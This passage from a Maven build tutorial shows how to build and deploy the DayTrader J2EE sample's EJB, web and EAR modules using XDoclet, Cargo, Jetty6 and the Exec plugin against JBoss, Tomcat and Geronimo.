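As noted above, the plugin also accepts clientInclude elements when it is easier to whitelist what goes into the client JAR than to blacklist what stays out. The sketch below is purely illustrative: the wrapper element name is assumed by analogy with clientExcludes, and the patterns are hypothetical:

  <configuration>
    <generateClient>true</generateClient>
    <clientIncludes>
      <clientInclude>**/ejb/*Home.class</clientInclude>
      <clientInclude>**/ejb/*Remote.class</clientInclude>
    </clientIncludes>
  </configuration>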
The EJB plugin has several other configuration elements that you can use to suit your exact needs. Please refer to the EJB plugin documentation at http://maven.apache.org/plugins/maven-ejb-plugin/.

Early adopters of EJB3 may be interested to know how Maven supports EJB3. At the time of writing, the EJB3 specification is still not final. There is a working prototype of an EJB3 Maven plugin; in the future it will be added to the main EJB plugin, after the specification is finalized. Stay tuned!
4.6. Building an EJB Module With Xdoclet

If you've been developing a lot of EJBs (version 1 and 2), you have probably used XDoclet to generate all of the EJB interfaces and deployment descriptors for you. When writing EJBs, it means you simply have to write your EJB implementation class, and XDoclet will generate the Home interface, the Remote and Local interfaces, the container-specific deployment descriptors, and the ejb-jar.xml descriptor. Note that if you're an EJB3 user, you can safely skip this section - you won't need it! Here's an extract of the TradeBean session EJB using Xdoclet:

  /**
   * Trade Session EJB manages all Trading services
   *
   * @ejb.bean
   *      display-name="TradeEJB"
   *      name="TradeEJB"
   *      view-type="remote"
   *      impl-class-name=
   *        "org.apache.geronimo.samples.daytrader.ejb.TradeBean"
   * @ejb.home
   *      generate="remote"
   *      remote-class=
   *        "org.apache.geronimo.samples.daytrader.ejb.TradeHome"
   * @ejb.interface
   *      generate="remote"
   *      remote-class=
   *        "org.apache.geronimo.samples.daytrader.ejb.Trade"
   * [...]
   */
  public class TradeBean implements SessionBean {
  [...]
      /**
       * Queue the Order identified by orderID to be processed in a
       * One Phase commit
       * [...]
       *
       * @ejb.interface-method
       *      view-type="remote"
       * @ejb.transaction
       *      type="RequiresNew"
       * [...]
       */
      public void queueOrderOnePhase(Integer orderID)
          throws javax.jms.JMSException, Exception
  [...]
To demonstrate XDoclet, create a copy of the DayTrader ejb module called ejb-xdoclet. As you can see in Figure 4-7, the project's directory structure is the same as in Figure 4-6.

Figure 4-7: Directory structure for the DayTrader ejb module when using Xdoclet

The other difference is that you only need to keep the *Bean.java classes and remove all of the Home, Local and Remote interfaces, as they'll also get generated. You don't need the ejb-jar.xml file anymore either, as it's going to be generated by Xdoclet.

Now you need to tell Maven to run XDoclet on your project. This is achieved by using the Maven XDoclet plugin and binding it to the generate-sources life cycle phase. Since XDoclet generates source files, this has to be run before the compilation phase occurs. Here's the portion of the pom.xml that configures the plugin:

  <plugin>
    <groupId>org.codehaus.mojo</groupId>
    <artifactId>xdoclet-maven-plugin</artifactId>
    <executions>
      <execution>
        <phase>generate-sources</phase>
        <goals>
          <goal>xdoclet</goal>
        </goals>
        <configuration>
          <tasks>
            <ejbdoclet verbose="true" force="true" ejbSpec="2.1"
                destDir="${project.build.directory}/generated-sources/xdoclet">
              <fileset dir="${project.build.sourceDirectory}">
                <include name="**/*Bean.java"></include>
                <include name="**/*MDB.java"></include>
              </fileset>
              <homeinterface/>
              <remoteinterface/>
              <localhomeinterface/>
              <localinterface/>
              <deploymentdescriptor
                  destDir="${project.build.outputDirectory}/META-INF"/>
            </ejbdoclet>
          </tasks>
        </configuration>
      </execution>
    </executions>
  </plugin>

The XDoclet plugin is configured within an execution element. This is required by Maven to bind the xdoclet goal to a phase. In the tasks element you use the ejbdoclet Ant task provided by the XDoclet project (for reference documentation see http://xdoclet.sourceforge.net/xdoclet/ant/xdoclet/modules/ejb/EjbDocletTask.html); here the need is to use the ejbdoclet task to instrument the EJB class files, but in practice you can use any XDoclet task (or more generally any Ant task) within the tasks element.

The plugin generates sources by default in ${project.build.directory}/generated-sources/xdoclet (you can configure this using the generatedSourcesDirectory configuration element). It also tells Maven that this directory contains sources that will need to be compiled when the compile phase executes. In addition, the XDoclet plugin will trigger Maven to download the XDoclet libraries from Maven's remote repository and add them to the execution classpath.

  [...]
  10 janv. 2006 16:53:50 xdoclet.XDocletMain start
  INFO: Running <deploymentdescriptor/>
  Generating EJB deployment descriptor (ejb-jar.xml).
  10 janv. 2006 16:53:50 xdoclet.XDocletMain start
  INFO: Running <homeinterface/>
  Generating Home interface for 'org.apache.geronimo.samples.daytrader.ejb.TradeBean'.
  [...]
  10 janv. 2006 16:53:50 xdoclet.XDocletMain start
  INFO: Running <remoteinterface/>
  Generating Remote interface for 'org.apache.geronimo.samples.daytrader.ejb.TradeBean'.
  [...]
  10 janv. 2006 16:53:51 xdoclet.XDocletMain start
  INFO: Running <localhomeinterface/>
  Generating Local Home interface for 'org.apache.geronimo.samples.daytrader.ejb.AccountBean'.
  [...]
  10 janv. 2006 16:53:51 xdoclet.XDocletMain start
  INFO: Running <localinterface/>
  Generating Local interface for 'org.apache.geronimo.samples.daytrader.ejb.AccountBean'.
  [...]
  [INFO] [ejb:ejb]
  [INFO] Building ejb daytrader-ejb-1.0
  [...]

You might also want to try XDoclet2. It's based on a new architecture, but the tag syntax is backward-compatible in most cases. However, it should be noted that XDoclet2 is a work in progress and is not yet fully mature, nor does it boast all the plugins that XDoclet1 has. There's also a Maven 2 plugin for XDoclet2 at http://xdoclet.codehaus.org/Maven2+Plugin.
4.7. Deploying EJBs

Now that you know how to build an EJB project, you will learn how to deploy it. Later, in the Testing J2EE Applications section of this chapter, you will also learn how to test it automatically. To do that, you will need to have Maven start the container automatically. Let's discover how you can automatically start a container and deploy your EJBs into it.

To do so you're going to use the Maven plugin for Cargo. Cargo is a framework for manipulating containers. It offers generic APIs (Java, Ant, Maven 1, Maven 2, IntelliJ IDEA, Netbeans, etc.) for performing various actions on containers such as starting, stopping, configuring them and deploying modules to them. See the Cargo web site (http://cargo.codehaus.org) for full details.

In this example, the JBoss container will be used. First, edit the ejb/pom.xml file and add the following Cargo plugin configuration:

    <build>
      <plugins>
        [...]
        <plugin>
          <groupId>org.codehaus.cargo</groupId>
          <artifactId>cargo-maven2-plugin</artifactId>
          <configuration>
            <container>
              <containerId>jboss4x</containerId>
              <zipUrlInstaller>
                <url>http://...dl.sourceforge.net/sourceforge/jboss/jboss-4.0.2.zip</url>
                <installDir>${installDir}</installDir>
              </zipUrlInstaller>
            </container>
          </configuration>
        </plugin>
      </plugins>
    </build>

In the container element you tell the Cargo plugin that you want to use JBoss 4.x (containerId element) and that you want Cargo to download the JBoss 4.0.2 distribution from the specified URL and install it in ${installDir}. The location where Cargo should install JBoss is a user-dependent choice and this is why the ${installDir} property was introduced. In order to build this project you need to create a Profile where you define the ${installDir} property's value.

If you want to debug Cargo's execution, you can use the log element to specify a file where Cargo logs will go, and you can also use the output element to specify a file where the container's output will be dumped. For example:

    <container>
      <containerId>jboss4x</containerId>
      <output>${project.build.directory}/jboss4x.log</output>
      <log>${project.build.directory}/cargo.log</log>
      [...]
As explained in Chapter 3, you can define a profile in the POM, in a profiles.xml file, or in a settings.xml file. Of course, as the content of the Profile is user-dependent you wouldn't want to define it in the POM, nor should the content be shared with other Maven projects at large. Thus the best place is to create a profiles.xml file. In this case, the profiles.xml file defines a profile named vmassol, activated by default and in which the ${installDir} property points to c:/apps/cargo-installs.

To start JBoss and deploy the EJB into it, the EJB JAR should first be created, so run mvn package to generate it. Then start the container with the cargo:start goal:

    [INFO] Searching repository for plugin with prefix: 'cargo'.
    [INFO] ----------------------------------------------------------------------
    [INFO] Building DayTrader :: EJBs
    [INFO]    task-segment: [cargo:start]
    [INFO] ----------------------------------------------------------------------
    [INFO] [cargo:start]
    [INFO] [talledLocalContainer] Parsed JBoss version = [4.0.2]
    [INFO] [talledLocalContainer] JBoss 4.0.2 starting...
    [INFO] [talledLocalContainer] JBoss 4.0.2 started on port [8080]
    [INFO] Press Ctrl-C to stop the container...

That's it! JBoss is running, and the EJB JAR has been deployed. The Cargo plugin does all the work: it provides a default JBoss configuration (using port 8080, for example), it detects that the Maven project is producing an EJB from the packaging element, and it automatically deploys it when the container is started.

It's also possible to tell Cargo that you already have JBoss installed locally. In that case, replace the zipUrlInstaller element with a home element. For example:

    <home>c:/apps/jboss-4.0.2</home>

That's all you need to have a working build and to deploy the EJB JAR into JBoss.
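For reference, here is a minimal sketch of what such a user-specific profile could look like if you prefer to keep it in your settings.xml rather than in a separate profiles.xml file. The profile id and the installDir value are just examples; adapt them to your own machine:

    <settings>
      <profiles>
        <profile>
          <id>vmassol</id>
          <activation>
            <!-- make this the default so no -P flag is needed -->
            <activeByDefault>true</activeByDefault>
          </activation>
          <properties>
            <installDir>c:/apps/cargo-installs</installDir>
          </properties>
        </profile>
      </profiles>
    </settings>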
As you have told Cargo to download and install JBoss, the first time you execute cargo:start it will take some time, especially if you are on a slow connection. Subsequent calls will be fast, as Cargo will not download JBoss again. To stop the container, call mvn cargo:stop. If the container was already started and you wanted to just deploy the EJB, you would run the cargo:deploy goal.

Cargo has many other configuration options, such as the possibility of using an existing container installation, deploying on a remote machine, modifying various container parameters, and more. Check the documentation at http://cargo.codehaus.org/Maven2+plugin.

4.8. Building a Web Application Project

Now, let's focus on building the DayTrader web module. The layout is the same as for a JAR module (see the first two chapters of this book), except that there is an additional src/main/webapp directory for locating Web application resources such as HTML pages, JSPs, WEB-INF configuration files, and more (see Figure 4-8).

Figure 4-8: Directory structure for the DayTrader web module showing some Web application resources
As usual, everything is specified in the pom.xml file:

    <project>
      <modelVersion>4.0.0</modelVersion>
      <parent>
        <groupId>org.apache.geronimo.samples.daytrader</groupId>
        <artifactId>daytrader</artifactId>
        <version>1.0</version>
      </parent>
      <artifactId>daytrader-web</artifactId>
      <name>DayTrader :: Web Application</name>
      <packaging>war</packaging>
      <description>DayTrader Web</description>
      <dependencies>
        <dependency>
          <groupId>org.apache.geronimo.samples.daytrader</groupId>
          <artifactId>daytrader-ejb</artifactId>
          <version>1.0</version>
          <type>ejb-client</type>
        </dependency>
        <dependency>
          <groupId>org.apache.geronimo.specs</groupId>
          <artifactId>geronimo-j2ee_1.4_spec</artifactId>
          <version>1.0</version>
          <scope>provided</scope>
        </dependency>
      </dependencies>
    </project>

You start by telling Maven that it's building a project generating a WAR:

    <packaging>war</packaging>

Next, you specify the required dependencies. The reason you are building this web module after the ejb module is because the web module's servlets call the EJBs. Therefore, you need to add a dependency on the ejb module in web/pom.xml:

    <dependency>
      <groupId>org.apache.geronimo.samples.daytrader</groupId>
      <artifactId>daytrader-ejb</artifactId>
      <version>1.0</version>
      <type>ejb-client</type>
    </dependency>

Note that you're specifying a type of ejb-client and not ejb. This is because the servlets are a client of the EJBs, and the servlets only need the EJB client JAR in their classpath to be able to call the EJBs. This is why you told the EJB plugin to generate a client JAR earlier on in ejb/pom.xml. Depending on the main EJB JAR would also work, but it's not necessary and would increase the size of the WAR file. It's always cleaner to depend on the minimum set of required classes, for example to prevent coupling.
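As a quick reminder of what that earlier ejb module configuration looks like, here is a minimal sketch of enabling client JAR generation with the EJB plugin. The generateClient flag is the relevant switch; any other plugin configuration from the earlier section is omitted here:

    <plugin>
      <groupId>org.apache.maven.plugins</groupId>
      <artifactId>maven-ejb-plugin</artifactId>
      <configuration>
        <!-- produce a *-client.jar alongside the main EJB JAR -->
        <generateClient>true</generateClient>
      </configuration>
    </plugin>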
That's nifty, isn't it? What happened is that the Jetty6 plugin realized the page was changed and redeployed the Web application automatically. The Jetty container automatically recompiled the JSP when the page was refreshed.

There are various configuration parameters available for the Jetty6 plugin, such as the ability to define Connectors and Security realms. For example, if you wanted to run Jetty on port 9090 with a user realm defined in etc/realm.properties, you would use:

    <plugin>
      <groupId>org.mortbay.jetty</groupId>
      <artifactId>maven-jetty6-plugin</artifactId>
      <configuration>
        [...]
        <connectors>
          <connector implementation=
              "org.mortbay.jetty.nio.SelectChannelConnector">
            <port>9090</port>
            <maxIdleTime>60000</maxIdleTime>
          </connector>
        </connectors>
        <userRealms>
          <userRealm implementation=
              "org.mortbay.jetty.security.HashUserRealm">
            <name>Test Realm</name>
            <config>etc/realm.properties</config>
          </userRealm>
        </userRealms>
      </configuration>
    </plugin>

You can also configure the context under which your Web application is deployed by using the contextPath configuration element. By default the plugin uses the module's artifactId from the POM. It's also possible to pass in a jetty.xml configuration file using the jettyConfig configuration element; in that case anything in the jetty.xml file will be applied first. For a reference of all configuration options, see the Jetty6 plugin documentation at .../jetty6/maven-plugin/index.html on the Jetty (Mortbay) web site.

Now imagine that you have an awfully complex Web application generation process: you have custom plugins that do all sorts of transformations to Web application resource files, possibly generating some files, and so on. The strategy above would not work, as the Jetty6 plugin would not know about the custom actions that need to be executed to generate a valid Web application. Fortunately there's a solution.
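For instance, a minimal sketch of overriding the context path could look like the following; the /daytrader value is only an illustration:

    <plugin>
      <groupId>org.mortbay.jetty</groupId>
      <artifactId>maven-jetty6-plugin</artifactId>
      <configuration>
        <!-- deploy under /daytrader instead of the artifactId-based default -->
        <contextPath>/daytrader</contextPath>
      </configuration>
    </plugin>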
The WAR plugin has an exploded goal which produces an expanded Web application in the target directory. The Jetty6 plugin also contains two goals that can be used in this situation:

• jetty6:run-war: The plugin first runs the package phase, which generates the WAR file. Then the plugin deploys the WAR file to the Jetty server and performs hot redeployments whenever the WAR is rebuilt (by calling mvn package from another window, for example) or when the pom.xml file is modified.

• jetty6:run-exploded: The plugin runs the package phase as with the jetty6:run-war goal. Calling this goal ensures that the generated Web application is the correct one. Then it deploys the unpacked Web application located in target/ (whereas the jetty6:run-war goal deploys the WAR file). The plugin then watches the following files: WEB-INF/lib, WEB-INF/classes, WEB-INF/web.xml and pom.xml; any change to those files results in a hot redeployment.

To demonstrate, execute the mvn jetty6:run-exploded goal on the web module:

    C:\dev\m2book\code\j2ee\daytrader\web>mvn jetty6:run-exploded
    [...]
    [INFO] [war:war]
    [INFO] Exploding webapp...
    [INFO] Assembling webapp daytrader-web in
           C:\dev\m2book\code\j2ee\daytrader\web\target\daytrader-web-1.0
    [INFO] Copy webapp resources to
           C:\dev\m2book\code\j2ee\daytrader\web\target\daytrader-web-1.0
    [INFO] Generating war
           C:\dev\m2book\code\j2ee\daytrader\web\target\daytrader-web-1.0.war
    [INFO] Building war:
           C:\dev\m2book\code\j2ee\daytrader\web\target\daytrader-web-1.0.war
    [INFO] [jetty6:run-exploded]
    [INFO] Configuring Jetty for project: DayTrader :: Web Application
    [INFO] Starting Jetty Server ...
    0 [main] INFO org.mortbay.log - Logging to
      org.slf4j.impl.SimpleLogger@78bc3b via org.mortbay.log.Slf4jLog
    [INFO] Context path = /daytrader-web
    2214 [main] INFO org.mortbay.log - Started SelectChannelConnector @ 0.0.0.0:8080
    [INFO] Scanning ...
    [INFO] Scan complete at Wed Feb 15 11:59:00 CET 2006
    [INFO] Starting scanner at interval of 10 seconds.
As you can see, the WAR is first assembled in the target directory and the Jetty plugin is now waiting for changes to happen. If you open another shell and run mvn package, you'll see the following in the first shell's console:

    [INFO] Scan complete at Wed Feb 15 12:02:31 CET 2006
    [INFO] Calling scanner listeners ...
    [INFO] Stopping webapp ...
    [INFO] Reconfiguring webapp ...
    [INFO] Restarting webapp ...
    [INFO] Restart completed.
    [INFO] Listeners completed.
    [INFO] Scanning ...

You're now ready for productive web development. No more excuses!

4.10. Deploying Web Applications

You have already seen how to deploy a Web application for in-place Web development in the previous section, so now the focus will be on deploying a packaged WAR to your target container. This example uses the Cargo Maven plugin to deploy to any container supported by Cargo (see http://cargo.codehaus.org/Containers). This is very useful when you're developing an application and you want to verify it works on several containers.

First, edit the web module's pom.xml file and add the Cargo configuration:

    <plugin>
      <groupId>org.codehaus.cargo</groupId>
      <artifactId>cargo-maven2-plugin</artifactId>
      <configuration>
        <container>
          <containerId>${containerId}</containerId>
          <zipUrlInstaller>
            <url>${url}</url>
            <installDir>${installDir}</installDir>
          </zipUrlInstaller>
        </container>
        <configuration>
          <properties>
            <cargo.servlet.port>8280</cargo.servlet.port>
          </properties>
        </configuration>
      </configuration>
    </plugin>
As you can see, this is a configuration similar to the one you used to deploy your EJBs in the Deploying EJBs section of this chapter. There are two differences though:

• Two new properties have been introduced (containerId and url) in order to make this build snippet generic. Those properties will be defined in a Profile. However, the containerId and url properties should be shared by all users of the build, so they belong in the POM rather than in a user-specific file. Thus, add the following profiles to the web/pom.xml file.

• As seen in the Deploying EJBs section, the installDir property is user-dependent and should be defined in a profiles.xml file.

In addition, a cargo.servlet.port property element has been introduced to show how to configure the containers to start on port 8280 instead of the default 8080 port. This is very useful if you have containers already running on your machine and you don't want to interfere with them.

    [...]
      </build>
      <profiles>
        <profile>
          <id>jboss4x</id>
          <activation>
            <activeByDefault>true</activeByDefault>
          </activation>
          <properties>
            <containerId>jboss4x</containerId>
            <url>http://...dl.sourceforge.net/sourceforge/jboss/jboss-4.0.2.zip</url>
          </properties>
        </profile>
        <profile>
          <id>tomcat5x</id>
          <properties>
            <containerId>tomcat5x</containerId>
            <url>http://www.apache.org/dist/jakarta/tomcat-5/v5.0.30/bin/jakarta-tomcat-5.0.30.zip</url>
          </properties>
        </profile>
      </profiles>
    </project>

You have defined two profiles: one for JBoss and one for Tomcat, and the JBoss profile is defined as active by default (using the activation element). You could add as many profiles as there are containers you want to execute your Web application on.
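Assuming these profile ids, you would run the build against Tomcat by explicitly activating that profile, for example with mvn install cargo:start -Ptomcat5x; the -P flag selects the profile, and without it the default JBoss profile applies.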
Executing mvn install cargo:start generates the WAR, starts the JBoss container and deploys the WAR into it:

    C:\dev\m2book\code\j2ee\daytrader\web>mvn install cargo:start
    [...]
    [INFO] [cargo:start]
    [INFO] [talledLocalContainer] JBoss 4.0.2 starting...
    [INFO] [CopyingLocalDeployer] Deploying
           [C:\dev\m2book\code\j2ee\daytrader\web\target\daytrader-web-1.0.war]
           to [C:\[...]\Temp\cargo\50866\webapps]...
    [INFO] [talledLocalContainer] JBoss 4.0.2 started on port [8280]
    [INFO] Press Ctrl-C to stop the container...

If you activate the tomcat5x profile instead, you'll see:

    [...]
    [INFO] [cargo:start]
    [INFO] [talledLocalContainer] Tomcat 5.0.30 starting...
    [INFO] [talledLocalContainer] Tomcat 5.0.30 started on port [8280]
    [INFO] Press Ctrl-C to stop the container...

This is useful for development and to test that your code deploys and works. However, once this is verified, you'll want a solution to deploy your WAR onto an integration platform. One solution is to have your container running on that integration platform and to perform a remote deployment of your WAR to it.

To deploy the DayTrader WAR to a running JBoss server on machine remoteserver and executing on port 80, you would need the following Cargo plugin configuration in web/pom.xml:

    <plugin>
      <groupId>org.codehaus.cargo</groupId>
      <artifactId>cargo-maven2-plugin</artifactId>
      <configuration>
        <container>
          <containerId>jboss4x</containerId>
          <type>remote</type>
        </container>
        <configuration>
          <type>runtime</type>
          <properties>
            <cargo.hostname>${remoteServer}</cargo.hostname>
            <cargo.servlet.port>${remotePort}</cargo.servlet.port>
            <cargo.remote.username>${remoteUsername}</cargo.remote.username>
            <cargo.remote.password>${remotePassword}</cargo.remote.password>
          </properties>
        </configuration>
      </configuration>
    </plugin>
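The ${remoteServer}, ${remotePort}, ${remoteUsername} and ${remotePassword} properties have to be defined somewhere. One option, sketched below, is a profile; the profile id and the values are placeholders, and real credentials are better kept in your settings.xml than in the shared POM:

    <profile>
      <id>integration-platform</id>  <!-- hypothetical profile id -->
      <properties>
        <remoteServer>remoteserver</remoteServer>
        <remotePort>80</remotePort>
        <remoteUsername>admin</remoteUsername>    <!-- placeholder -->
        <remotePassword>secret</remotePassword>   <!-- placeholder -->
      </properties>
    </profile>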
When compared to the configuration for a local deployment above, the changes are:

• A remote container and configuration type, to tell Cargo that the container is remote and not under Cargo's management.

• Several configuration properties (especially a user name and password allowed to deploy on the remote JBoss container) to specify all the details required to perform the remote deployment.

All the properties introduced need to be declared inside the POM for those shared with other users, and in the profiles.xml file (or the settings.xml file) for those that are user-dependent. Note that there was no need to specify a deployment URL, as it is computed automatically by Cargo. Check the Cargo reference documentation for all details on deployments at http://cargo.codehaus.org/Deploying+to+a+running+container.

4.11. Building an EAR Project

You have now built all the individual modules. It's time to package the server module artifacts (EJB and WAR) into an EAR for convenient deployment. The ear module's directory structure can't be any simpler: it solely consists of a pom.xml file (see Figure 4-11).

Figure 4-11: Directory structure of the ear module

As usual, the magic happens in the pom.xml file. Start by defining that this is an EAR project by using the packaging element:

    <project>
      <modelVersion>4.0.0</modelVersion>
      <parent>
        <groupId>org.apache.geronimo.samples.daytrader</groupId>
        <artifactId>daytrader</artifactId>
        <version>1.0</version>
      </parent>
      <artifactId>daytrader-ear</artifactId>
      <name>DayTrader :: Enterprise Application</name>
      <packaging>ear</packaging>
      <description>DayTrader EAR</description>
Next, define all of the dependencies that need to be included in the generated EAR:

    <dependencies>
      <dependency>
        <groupId>org.apache.geronimo.samples.daytrader</groupId>
        <artifactId>daytrader-streamer</artifactId>
        <version>1.0</version>
      </dependency>
      <dependency>
        <groupId>org.apache.geronimo.samples.daytrader</groupId>
        <artifactId>daytrader-wsappclient</artifactId>
        <version>1.0</version>
      </dependency>
      <dependency>
        <groupId>org.apache.geronimo.samples.daytrader</groupId>
        <artifactId>daytrader-ejb</artifactId>
        <version>1.0</version>
        <type>ejb</type>
      </dependency>
      <dependency>
        <groupId>org.apache.geronimo.samples.daytrader</groupId>
        <artifactId>daytrader-web</artifactId>
        <version>1.0</version>
        <type>war</type>
      </dependency>
    </dependencies>

Finally, you need to configure the Maven EAR plugin by giving it the information it needs to automatically generate the application.xml deployment descriptor file. This includes the display name to use, the description to use, and the J2EE version to use. It is also necessary to tell the EAR plugin which of the dependencies are Java modules, Web modules, and EJB modules. At the time of writing, the EAR plugin supports the following module types: ejb, ejb3, ejb-client, jar, par, rar, sar, war and wsr.
By default, all dependencies are included, with the exception of those that are optional, or those with a scope of test or provided. However, it is often necessary to customize the inclusion of some dependencies, as shown in this example:

    <build>
      <plugins>
        <plugin>
          <groupId>org.apache.maven.plugins</groupId>
          <artifactId>maven-ear-plugin</artifactId>
          <configuration>
            <displayName>Trade</displayName>
            <description>
              DayTrader Stock Trading Performance Benchmark Sample
            </description>
            <version>1.4</version>
            <modules>
              <javaModule>
                <groupId>org.apache.geronimo.samples.daytrader</groupId>
                <artifactId>daytrader-streamer</artifactId>
                <includeInApplicationXml>true</includeInApplicationXml>
              </javaModule>
              <javaModule>
                <groupId>org.apache.geronimo.samples.daytrader</groupId>
                <artifactId>daytrader-wsappclient</artifactId>
                <includeInApplicationXml>true</includeInApplicationXml>
              </javaModule>
              <webModule>
                <groupId>org.apache.geronimo.samples.daytrader</groupId>
                <artifactId>daytrader-web</artifactId>
                <contextRoot>/daytrader</contextRoot>
              </webModule>
            </modules>
          </configuration>
        </plugin>
      </plugins>
    </build>
    </project>

Here, the contextRoot element is used for the daytrader-web module definition to tell the EAR plugin to use that context root in the generated application.xml file. You should also notice that you have to specify the includeInApplicationXml element in order to include the streamer and wsappclient libraries in the EAR. By default, only EJB client JARs are included when specified in the Java modules list.
It is also possible to configure where the JARs' Java modules will be located inside the generated EAR. For example, if you wanted to put the libraries inside a lib subdirectory of the EAR, you would use the bundleDir element:

    <javaModule>
      <groupId>org.apache.geronimo.samples.daytrader</groupId>
      <artifactId>daytrader-streamer</artifactId>
      <includeInApplicationXml>true</includeInApplicationXml>
      <bundleDir>lib</bundleDir>
    </javaModule>

Alternatively, the defaultBundleDir element sets the bundle directory for all modules at once:

    [...]
    <defaultBundleDir>lib</defaultBundleDir>
    <modules>
      <javaModule>
        [...]
      </javaModule>
    [...]

There are some other configuration elements available in the EAR plugin, which you can find out about by checking the reference documentation on http://maven.apache.org/plugins/maven-ear-plugin.

The streamer module's build is not described in this chapter because it's a standard build generating a JAR. However, the ear module depends on it, and thus you'll need to have the Streamer JAR available in your local repository before you're able to run the ear module's build. Run mvn install in daytrader/streamer.
To generate the EAR, run mvn install:

    C:\dev\m2book\code\j2ee\daytrader\ear>mvn install
    [...]
    [INFO] [ear:generate-application-xml]
    [INFO] Generating application.xml
    [INFO] [resources:resources]
    [INFO] Using default encoding to copy filtered resources.
    [INFO] [ear:ear]
    [INFO] Copying artifact [jar:org.apache.geronimo.samples.daytrader:
           daytrader-streamer:1.0] to [daytrader-streamer-1.0.jar]
    [INFO] Copying artifact [jar:org.apache.geronimo.samples.daytrader:
           daytrader-wsappclient:1.0] to [daytrader-wsappclient-1.0.jar]
    [INFO] Copying artifact [ejb:org.apache.geronimo.samples.daytrader:
           daytrader-ejb:1.0] to [daytrader-ejb-1.0.jar]
    [INFO] Copying artifact [ejb-client:org.apache.geronimo.samples.daytrader:
           daytrader-ejb:1.0] to [daytrader-ejb-1.0-client.jar]
    [INFO] Copying artifact [war:org.apache.geronimo.samples.daytrader:
           daytrader-web:1.0] to [daytrader-web-1.0.war]
    [INFO] Could not find manifest file:
           C:\dev\m2book\code\j2ee\daytrader\ear\src\main\application\
           META-INF\MANIFEST.MF - Generating one
    [INFO] Building jar: C:\dev\m2book\code\j2ee\daytrader\ear\
           target\daytrader-ear-1.0.ear
    [INFO] [install:install]
    [INFO] Installing C:\dev\m2book\code\j2ee\daytrader\ear\
           target\daytrader-ear-1.0.ear to C:\[...]\.m2\repository\org\apache\
           geronimo\samples\daytrader\daytrader-ear\1.0\daytrader-ear-1.0.ear
You should review the generated application.xml to prove that it has everything you need:

    <?xml version="1.0" encoding="UTF-8"?>
    <application xmlns="http://java.sun.com/xml/ns/j2ee"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
            http://java.sun.com/xml/ns/j2ee/application_1_4.xsd"
        version="1.4">
      <description>
        DayTrader Stock Trading Performance Benchmark Sample
      </description>
      <display-name>Trade</display-name>
      <module>
        <java>daytrader-streamer-1.0.jar</java>
      </module>
      <module>
        <java>daytrader-wsappclient-1.0.jar</java>
      </module>
      <module>
        <web>
          <web-uri>daytrader-web-1.0.war</web-uri>
          <context-root>/daytrader</context-root>
        </web>
      </module>
      <module>
        <ejb>daytrader-ejb-1.0.jar</ejb>
      </module>
    </application>

This looks good. The next section will demonstrate how to deploy this EAR into a container.

4.12. Deploying a J2EE Application

You have already learned how to deploy EJBs and WARs into a container individually. Deploying EARs follows the same principle. In this section, you'll deploy the DayTrader EAR into Geronimo.

Geronimo is somewhat special among J2EE containers in that deploying requires calling the Deployer tool with a deployment plan. A plan is an XML file containing configuration information such as how to map CMP entity beans to a specific database, how to map J2EE resources in the container, etc. Like any other container, Geronimo also supports having this deployment descriptor located within the J2EE archives you are deploying. However, it is recommended that you use an external plan file so that the deployment configuration is independent from the archives getting deployed, enabling the Geronimo plan to be modified to suit the deployment environment.

The DayTrader application does not deploy correctly when using JDK 5 or newer. You'll need to use JDK 1.4 for this section and the following ones.
To get started, store the deployment plan in ear/src/main/deployment/geronimo/plan.xml. If you wanted to deploy with Cargo, you would need the following pom.xml configuration snippet:

    <plugin>
      <groupId>org.codehaus.cargo</groupId>
      <artifactId>cargo-maven2-plugin</artifactId>
      <configuration>
        <container>
          <containerId>geronimo1x</containerId>
          <zipUrlInstaller>
            <url>http://www.apache.org/dist/geronimo/1.0/geronimo-tomcat-j2ee-1.0.zip</url>
            <installDir>${installDir}</installDir>
          </zipUrlInstaller>
        </container>
        <deployer>
          <deployables>
            <deployable>
              <properties>
                <plan>${basedir}/src/main/deployment/geronimo/plan.xml</plan>
              </properties>
            </deployable>
          </deployables>
        </deployer>
      </configuration>
    </plugin>
However, in this section you'll learn how to use the Maven Exec plugin. This plugin can execute any process. You'll use it to run the Geronimo Deployer tool to deploy your EAR into a running Geronimo container. Even though it's recommended to use a specific plugin like the Cargo plugin (as described in 4.13, Testing J2EE Applications), learning how to use the Exec plugin is useful in situations where you want to do something slightly different, or when Cargo doesn't support the container you want to deploy into.

Modify the ear/pom.xml to configure the Exec plugin:

    <plugin>
      <groupId>org.codehaus.mojo</groupId>
      <artifactId>exec-maven-plugin</artifactId>
      <configuration>
        <executable>java</executable>
        <arguments>
          <argument>-jar</argument>
          <argument>${geronimo.home}/bin/deployer.jar</argument>
          <argument>--user</argument>
          <argument>system</argument>
          <argument>--password</argument>
          <argument>manager</argument>
          <argument>deploy</argument>
          <argument>
            ${project.build.directory}/${project.build.finalName}.ear
          </argument>
          <argument>
            ${basedir}/src/main/deployment/geronimo/plan.xml
          </argument>
        </arguments>
      </configuration>
    </plugin>

You may have noticed that you're using a geronimo.home property that has not been defined anywhere. As you've seen in the EJB and WAR deployment sections above and in previous chapters, it's possible to create properties that are defined either in a properties section of the POM or in a Profile. As the location where Geronimo is installed varies depending on the user, put the following profile in a profiles.xml or settings.xml file:

    <profiles>
      <profile>
        <id>vmassol</id>
        <properties>
          <geronimo.home>c:/apps/geronimo-1.0-tomcat</geronimo.home>
        </properties>
      </profile>
    </profiles>

At execution time, the Exec plugin will transform the executable and arguments elements above into the following command line:

    java -jar c:/apps/geronimo-1.0-tomcat/bin/deployer.jar --user system
      --password manager deploy
      C:\dev\m2book\code\j2ee\daytrader\ear\target/daytrader-ear-1.0.ear
      C:\dev\m2book\code\j2ee\daytrader\ear/src/main/deployment/geronimo/plan.xml
First, start your preinstalled version of Geronimo and run mvn exec:exec:

    C:\dev\m2book\code\j2ee\daytrader\ear>mvn exec:exec
    [...]
    [INFO] [exec:exec]
    [INFO] Deployed Trade
    [INFO]   `-> daytrader-web-1.0-SNAPSHOT.war
    [INFO]   `-> daytrader-ejb-1.0-SNAPSHOT.jar
    [INFO]   `-> daytrader-streamer-1.0-SNAPSHOT.jar
    [INFO]   `-> daytrader-wsappclient-1.0-SNAPSHOT.jar
    [INFO]   `-> TradeDataSource
    [INFO]   `-> TradeJMS

You can now access the DayTrader application by opening your browser to the /daytrader context on the Geronimo server (http://localhost:8080/daytrader by default).

